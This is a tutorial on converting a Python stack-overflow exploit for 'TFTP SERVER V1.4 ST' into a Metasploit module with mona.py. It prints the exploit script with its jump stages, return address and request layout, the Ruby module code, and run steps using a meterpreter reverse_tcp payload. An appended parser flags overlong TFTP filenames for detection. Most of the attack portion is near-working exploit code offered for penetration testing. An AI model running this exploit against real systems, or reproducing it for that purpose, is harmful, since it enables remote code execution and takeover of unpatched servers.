The Metasploit framework is an open source project that is quite popular amongst security analysts. Most current exploits are written in C, Python, Perl and so on. To increase the reach of well known exploits for testing purposes, it is advisable to port them into the Metasploit framework. Since Metasploit became active only in 2009, many exploits are still not converted. This article walks the reader through converting an exploit from another language into a Metasploit module.
To convert an exploit written in Python or another language into Metasploit, we first have to know the structure of a Metasploit module. That structure can be generated automatically with mona.py for any exploit type. Immunity Debugger must be installed first, and mona.py then placed in its PyCommands directory.
Configuring the Immunity debugger with mona
Step 1. Open Immunity Debugger and type "!mona help assemble".
Step 2. To set the folder where the generated exploit skeleton will be stored, type "!mona config -set workingfolder d:\logs\%p". (Create the folder logs on the d: drive first.)
Converting the python exploit
Consider the Python exploit given below (the page omits the 330 bytes of payload assigned to "shell"; the socket error handling and the missing imports are restored here so the script parses):
import socket
import sys

host = '192.168.28.130'
port = 69
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # udp connection
except socket.error:
    print "socket() failed"
    sys.exit(1)
# msfpayload windows/shell_bind_tcp -b \x00
# this will give you the command shell of the victim
shell = (
    "" # the 330 bytes of payload hex are omitted on the page
)
# Stage 3: jump back 1490 bytes to the start of the buffer
# Stage 2: jmp 5 bytes to make a far jump
# Stage 1: return address 0x00409605 in TFTFPSERVER.EXE
stage4 = "\x90"*50 + shell
stage3 = "\xE9\x2E\xFA\xFF\xFF"
stage2 = "\xEB\xF9\x90\x90"
stage1 = "\x05\x96\x40"
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
print "file created"
mode = "netascii"
# TFTP read request: opcode 1, filename, NUL, mode, NUL
youlose = "\x00\x01" + filename + "\x00" + mode + "\x00"
s.sendto(youlose, (host, port))
- The variable "shell" holds 330 bytes of hex-encoded shellcode. These bytes are the payload to be used. The buffer size here is 1490 bytes.
- In stage 3, we jump back 1490 bytes to the start of the buffer.
- In stage 2, we jump 5 bytes to make a far jump.
- In stage 1, we specify the return address 0x00409605 in TFTFPSERVER.EXE.
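As an added illustration of the request format the exploit builds (not code from the original article), the following parser checks a UDP payload destined for port 69 against the TFTP read/write request layout (2-byte opcode, filename, NUL, mode, NUL) and flags requests whose filename is far longer than any real file name, which is how an oversized request like the one above would stand out in traffic. The 255-byte threshold and the sample packets are constructed for this example.

```python
import struct

# TFTP request opcodes (RFC 1350): 1 = read request, 2 = write request.
OPCODES = {1: "RRQ", 2: "WRQ"}
# Hypothetical alert threshold; legitimate TFTP file names are far shorter.
MAX_SANE_FILENAME = 255

def parse_tftp_request(packet):
    """Parse a TFTP RRQ/WRQ. Returns a dict or raises ValueError."""
    if len(packet) < 4:
        raise ValueError("too short for a TFTP request")
    opcode = struct.unpack("!H", packet[:2])[0]
    if opcode not in OPCODES:
        raise ValueError("not a request opcode: %d" % opcode)
    fields = packet[2:].split(b"\x00")
    # A well-formed request ends with NUL, so the last split element is empty.
    if len(fields) < 3 or fields[-1] != b"":
        raise ValueError("malformed request: missing NUL terminators")
    filename, mode = fields[0], fields[1]
    if mode.lower() not in (b"netascii", b"octet", b"mail"):
        raise ValueError("unknown transfer mode %r" % mode)
    return {"op": OPCODES[opcode], "filename": filename, "mode": mode.decode()}

def classify_request(packet):
    """Return 'ok', 'malformed' or 'suspicious' for one UDP payload to port 69."""
    try:
        req = parse_tftp_request(packet)
    except ValueError:
        return "malformed"
    if len(req["filename"]) > MAX_SANE_FILENAME:
        return "suspicious"
    return "ok"

# Constructed sample packets, not captures: a normal request and an
# overlong file name of the size the exploit above sends (no payload bytes).
BENIGN = b"\x00\x01" + b"boot.cfg" + b"\x00" + b"octet" + b"\x00"
OVERLONG = b"\x00\x01" + b"A" * 1500 + b"\x00" + b"netascii" + b"\x00"

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("overlong", OVERLONG)):
        print(name, classify_request(pkt))
```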
To convert this to a Metasploit module:
Step 1. From the Python exploit above we know that the connection type is UDP, the port is 69 and it is a TFTP exploit.
Step 2. To generate the skeleton, type "!mona skeleton" in Immunity Debugger and press Enter.
Step 3. Select the exploit type "udp" and click OK.
Step 4. Enter 69 as the remote port and click OK.
Step 5. The skeleton is now generated in "d:\logs" as msfskeleton.rb, a Ruby file. Rename it to something appropriate.
Step 6. Enter the author name, the description of the exploit, where it was found, and so on.
Step 7. Set the payload space to 500 under the Payload section of the module structure. This is the maximum size of the payload that can be attached (it can be determined with Immunity Debugger).
Step 8. As we can see, a hexadecimal value is attached to the 'stage1' variable; this is the address that overwrites the SIP. The address is in big endian representation. Written in the normal form it is '0x00409605' (hexadecimal); put that into the Targets array in the Ruby file (in the Metasploit structure).
stage = "\x00\x01" # TFTP read request opcode, as in the Python exploit
stage << make_nops(50) + payload.encoded
stage << rand_text_alpha(1487-(payload.encoded.length+50))
stage << "\xE9\x2E\xFA\xFF\xFF" # stage 3: jump back to the start of the buffer
stage << "\xEB\xF9\x90\x90" # stage 2: short jump back 5 bytes
stage << [target.ret].pack('V') # stage 1: return address from the Targets array
stage << "\x00"+"netascii"+"\x00"
Step 9. In the converted module, make_nops(50) inserts 50 no-op instructions. payload.encoded holds the encoded payload, that is, the action to be performed on the victim machine.
Step 10. rand_text_alpha() generates random alphabetic text to fill the buffer.
Step 11. We add the return address taken from the Targets array, and pack('V') converts it to the byte format the exploit requires.
Running the exploits
Step 1. The parameters to be entered are RHOST, LHOST and PAYLOAD.
Step 2. Select the payload. Let's select windows/meterpreter/reverse_tcp.
Step 3. Let's exploit.
The exploit was tested on Windows XP SP3. To run the exploit, the victim system must have "TFTP SERVER V1.4 ST" installed.
Metasploit code is available here.